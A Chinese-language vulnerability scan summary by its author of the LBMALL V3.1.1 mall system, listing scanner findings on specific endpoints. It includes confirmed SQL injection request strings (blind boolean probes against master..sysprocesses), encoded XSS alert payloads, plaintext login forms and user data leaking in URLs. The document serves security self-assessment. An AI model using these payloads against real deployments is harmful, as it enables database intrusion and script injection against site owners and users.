paip. lbmall V3.1.1 乐彼多用户商城系统的安全漏洞总结
作者Attilax , 1466519819@qq.com
因为我的网站中账户模块是用LBMALL V3.1.1实现的..今天特意扫描了下它的安全漏洞,用的是HPWI9。。
结果发现了 32条高危漏洞
SQL注入(7个漏洞):
---------------------
Critical SQL 盲注(已确认) GET http://localhost/News/List.aspx (Query) tid=0&title=12345'%09OR%09(select%09Ascii(substring(db_name(dbid)%2c2%2c1))%09from%09master..sysprocesses%09where%09spid%3d%40%40SPID)%3c128%09OR%09'4'%3d'0
Critical SQL 注入(已确认) POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认) POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认) POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认) GET http://localhost/ShopType.aspx (Query) keyword=12345&bprice=12345&eprice=12345%09and%09(select%09count(*)%09from%09spitable)%09%3d%091%09or%091%3d0%09&typeid=&id=1
Critical SQL 注入(已确认) GET http://localhost/ShopType.aspx (Query) keyword=12345'%09and%09(select%09count(*)%09from%09spitable)%3d1%09or%09'1'%3d'0%09&bprice=12345&eprice=12345&typeid=&id=1
Critical SQL 注入(已确认) GET http://localhost/ShopType.aspx (Query) typeid=0%09and%09(select%09count(*)%09from%09spitable)%09%3d%091%09or%091%3d0%09&id=1
XSS 跨站点脚本(7个漏洞):
---------------------
Critical 跨站点脚本 POST http://localhost/admin/AdminMessage_List.aspx (Post) __VIEWSTATE=%2fwEPDwUJNDg2ODAwMjM5ZGS1Pa6AspCR%2fQg9Erqa8s1q0Oltlw%3d%3d&hid_checkbox=&hid_page=&hid_type=&dateFrom=12345%27%3b%61%6c%65%72%74%28%38%31%36%33%33%29%2f%2f&dateTo=12345&txtSelectInfo=12345...
Critical 跨站点脚本 POST http://localhost/admin/AdminMessage_List.aspx (Post) __VIEWSTATE=%2fwEPDwUJNDg2ODAwMjM5ZGS1Pa6AspCR%2fQg9Erqa8s1q0Oltlw%3d%3d&hid_checkbox=&hid_page=&hid_type=&dateFrom=12345&dateTo=12345%27%3b%61%6c%65%72%74%28%38%31%36%33%33%29%2f%2f&txtSelectInfo=12345...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=1%2c&top=&rec=&arg=&check_=1&hidden_id0=1&txt_title0=titttttt...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&rec=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&top=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&top=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?%22%20%73%54%79%4c%65%3d%58%3a%65%58%2f%2a%...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=%22%20%73%54%79%4c%65%3d%58%3a%65%58%2f%2a%2a%2f%70%52%65%53%73%49%6f%4e%28%61%6c%65%72%74%28%36%34%31%33%34%29%29%20%2...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本(用户交互) POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本(用户交互) POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本(用户交互) POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?%22%20%6f%4e%66%4f%63%55%73%3d%61%6c%65%72%74%28%37%33%35%31%33%29%2...
Critical 跨站点脚本(用户交互) POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?%22%20%6f%4e%66%4f%63%55%73%3d%4d%73%67%42%6f%78%28%35%36%31%32%36%29%20%22&hidden_id2=3&txt_...
明文传输密码漏洞以及登录窗体敏感漏洞(5条)
--------------------------------------------------
High 通过未加密的连接发送登录信息 GET http://localhost/admin/Login.aspx
High 通过未加密的连接发送登录信息 GET http://localhost/Login.aspx (Query) uu=user/Default.aspx
High 通过未加密的连接发送登录信息 GET http://localhost/Login.aspx
High 未加密的登录窗体 GET http://localhost/admin/Login.aspx
High 未加密的登录窗体 GET http://localhost/Login.aspx (Query) uu=user/Default.aspx
敏感信息泄露URL/COOKIE/POST (13条)
---------------------------------
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Accounta.aspx (Query) uid=20&page=1
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Accounta.aspx (Query) uid=
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) auname=asfda
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) stime=12345&etime=12345&unames=12345&page=1
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/AccountLog.aspx (Query) auname=asfda (Post) __VIEWSTATE=%2fwEPDwUKMTE4MzA5MTAwN2Rk98WeigzHhrAdKMe3%2bv8Gy9tXMtw%3d&txt_starttime=12345&txt_endtime=12345&txt_username=12345&Submit.x=5&Submit.y=5&=26&=25&=24&=23&=22&=21&=20&=19&=18&=1...
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/AccountLog.aspx (Query) auname=asfda (Post) __VIEWSTATE=%2fwEPDwUKMTE4MzA5MTAwN2Rk98WeigzHhrAdKMe3%2bv8Gy9tXMtw%3d&txt_starttime=12345&txt_endtime=12345&txt_username=12345&Submit.x=5&Submit.y=5&=25&=24&=23&=22&=21&=20&=19&=18&=17&=1...
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) auname=asfda&page=2
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Userlist.aspx (Query) usernames=12345&letime=12345&letime2=12345
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Userlist.aspx (Query) usernames=
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/Userlist.aspx (Query) usernames= (Post) __VIEWSTATE=%2fwEPDwUKLTc1MDEzNTU0N2Rki2tGFykf2v4TZF1Ik3esdjZtfhY%3d&txt_starttime=12345&txt_endtime=12345&txt_search=12345
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/Login.aspx (Query) uu=user/Default.aspx
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/Login.aspx
Low “Admin”目录 GET http://localhost/admin/